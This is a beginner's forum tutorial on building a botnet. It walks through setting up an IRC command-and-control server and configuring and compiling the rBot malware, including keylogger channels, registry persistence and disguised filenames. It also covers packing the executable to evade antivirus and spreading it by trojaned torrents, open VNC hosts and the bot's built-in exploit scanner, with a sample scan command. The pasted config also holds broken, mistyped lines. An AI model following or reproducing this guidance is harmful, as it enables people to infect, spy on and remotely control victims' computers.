How To Start A Botnet

Well since many beginners want to know how botnet and stuff works, im
create a little tutorial for the beginners on this site. The tutorial
includes how to install a ircd, how to compile a bot & ways to

"Chapters"

1. What is needed

2. How to configure an (unreal)ircd

3. How to compile your bot

4. Make your exe UD

5. Ways of spreading.



Before I begin, my english isn't 100% good, i'll try to translate
everything as good as possible, sorry for false lines or words.



1. What is needed

There are many things which are needed for creating a botnet. I'll make a
list of stuff which is needed for botnets and explain why they are
needed.



- Visual Studio 6.0 ( Download )

- Visual Studio 6 Service Pack 5 ( Download )

- Visual Studio 6.0 Processor Pack ( Download )

- Core SDK ( Download, Safe them somewhere do cmd, cd Directoryoffile and use psdk-full Directoryofoutput)

For a tutorial to install all the things up here go to here[/]



- a rooted windows box (Linux can be done also but im telling about windows)

- a ircd (There are some at this forum search yourself)

- a botsource (I used rBot for example, find some old ones here: Download



Well that was it I think?









2. How to configure an (unreal)ircd

Most ircd's are really easy to configurate, especially modded ones. Most
of the times you only have to edit the name, the authost, the ircd port
& the admin user&pass. What do we have to edit:

Code:

oper your-choosen-username { // Edit your choosen name to a username you want

from {

userhost "yourname@*"; // Edit your name to your emailaddres

};

password "your-choosen-pass"; // Edit your choosen pass to a password you want

class "default";

flags {

netadmin;

services-admin;

global;

helpop;

can_rehash

can_globalnotice;

can_globalroute;

can_globops;

can_wallops;

can_unkline;

can_kline;

can_globalkill;

can_zline;

can_gkline;

can_gzline;

get_umodew;

get_host;

can_override;

can_die;

can_restart;

};

};



Edit the flags here above, if you want to add more ircds owners just copy paste this shit





Code:



me { name "Black-listed"; info "LEthalcode"; numeric 1; };



Here is the Server name, name can be "irc.cybersecurity.in", information is just some info





Code:

listen *:6667;

easily edit the port to a port which is open, most ports from 6500 -> 7000 are open







Some extra things to edit

Code:

hosts {

local "Team-blacklisted";

global "Team-blacklisted";

coadmin "Team-blacklisted";

admin "Team-blacklisted";

servicesadmin "Team-blacklisted";

netadmin "Team-blacklisted";

host-on-oper-up "yes";

};

};



The sethost's you get if you oper, like lethalcode@local.cybersecurity.in/ lethalcode@global.cybersecurity.in
And just put "no" in host-on-oper-up if you don't want to get an auto-host selected.





Code:

restrict-channelmodes "lethalcode";

modes-on-join "+lethalcode";



Edit this to your own options to make your channel secure for you







Now just safe the cfg, and your done with the config. Rar the files and
uplaod it to somewhere. What you gotta do now is open a windows box (on
vnc??) and download the files and place them in a secure folder, like
C:Windows?. then just run the exe which allows to start the ircd, or run
the batch file which is most there in the modded ircds, you'll see the
ircd is running. Don't forget to set a password on the VNC so no-one can
catch your oper user&pass, secure all the ports so your botnet
don't get sniffed.



Were done with this one now too.









3. How to compile your bot

You probally found a rBot source you like by now, in the url I gave you
there were many sources, I've picked a rBot, which is a good bot to
start with since it got all standard functions & scanners and it's
the easiest bot. ill copy and paste the config and will explain what to
do.

Code:



// bot configuration (generic) - doesn't need to be encrypted

int port = 6667;

int port2 = 6667;

int socks4port = 8001;

int tftpport = 69;

int httpport = 5465;

int rloginport = 514;

BOOL topiccmd = TRUE;

BOOL rndfilename = FALSE;

BOOL AutoStart = TRUE;

char prefix = '.';

int maxrand = 8;

int nicktype = CONSTNICK;

BOOL nickprefix = FALSE;



#ifdef DEBUG_LOGGING

char logfile[]="%temp%yas.jpg";

#endif



#ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!



#else // Recommended to use this only for Crypt() setup, this is unsecure.



char botid[] = "rx-asn-2-re-worked";

char version[] = "v2 by ovelayer";

char password[] = "yourpass";

char server[] = "";

char serverpass[] = "";

char channel[] = "#";

char chanpass[] = "";rd

char server2[] = ""

char channel2[] = "#";

char chanpass2[] = "";

char filename[] = "yourfile.exe";

char keylogfile[] = "keylog.xml"l

char valuename[] = "";

char nickconst[] = "rBot|";

char szLocalPayloadFile[]="yourfile.exe";

char modeonconn[] = "-xi+B";

char exploitchan[] = "#*";

char keylogchan[] = "#*";

char psniffchan[] = "#*";



char *authost[] = {

"yournick@172.0.0.1"

};



char *versionlist[] = {

"mIRC v6.12 Khaled Mardam-Bey",

};



char regkey1[]="SoftwareMcftWindowsCurrentVersionRun";

char regkey2[]="SoftwareMcftWindowsCurrentVersionRunServices" ;

char regkey3[]="SoftwareMcftOLE";

char regkey4[]="SYSTEMCurrentControlSetControlLsa";



#endif



#ifdef PLAIN_CRYPT

char key[16] = "39lwmmqopma24ik1"; // CHANGE THIS!!! hmmm..Do I even need this now?

#endif







1. Change the port to the port of your ircd, normally it's 6667, if you got else, just change them.

2. Change the prefix, normally its ".", thats what you have to use before the command so like ".login yourpass".

3. the password, change it to login to your bot ".login unknownpass"

4. the serverpassword, probally you ain't got one but if so edit there.

5. the server, add your IP/DNS There.

6. Your channel, edit your channel where the bots got to join.

7. Your chanpass, change it to be more secure.

8. leave the server 2 of rbot, cuz the code of that thing doesn't work.

9. Change the filename so it won't get killed easily by a user because it's a suspicious virus.

10. the file where the computers puts his keylog shit in, not needed actually.

11. value name, so if your exe is called nod32, then the valuename = Nod32 AntiVirus or something

12. nickconst is the prefix before a bot. like rBot|12312312

13. the modes on connect, you can leave that as it is.

14. exploit channel, if the bot is spreading it will leave it exploit message's there.

15. The keylog & psniff channel, it will send the pstore &
keylog messages, but PSNIFF isn't working in rBot so ~censored~ that

16. The authost, you can set your authost like g7onic@*, that will
require you to have a nicname with all hosts, you can set
*@anonym0us.eu, that will require you to have your host set like
anonym0us.eu and you have to most secure one: lethalcode@anonym0us.eu this requires you the nickname & the host!.

17. Leave the rest as it is.



Ask for questions, but I think this help you out.



4. Make your exe UD.

Before you start with everything you got to secure your exe, there are
packers for, it's hard to get a good packer at this moment, but you can
use some public ones which make you exe detected for nod32, kasperspy
etc (the big antivirus company's). Your file got to be small so it's
easy to spread to other rooted boxes, but also undetected, otherwise a
antivirus detect it.



5. Ways of spreading

Their are many different types of spreading, you need bots to start with
before you can spread via exploits which are in your bots. There are
different ways to get your bots, you can easily ask a mate to let his
bots download some bots to your exe which allows you to start a bnet,
but you can also spread via torrent just make a torrent with a movie and
your exe as "codec" or something, or scan for some vnc's and infect
them easily opening ie and open exe (REMOVE HISTORY!).



If you got some bots ( upper 30 bots ) you can start spreading, your
bots have different types of exploits in it, asn1smb, lsass, dcom and
all standard exploits, Since these are old they won't spread fast, but
some of them still work okay on the right range. the standard command to
scan with your bots is .advscan exploit <Threads> <seconds>
<delay> ip range <flags (use -b-r) so like .advscan asn1smb 80
5 0 255.255.x.x -b -r.

Posted in: botnet,how,start,to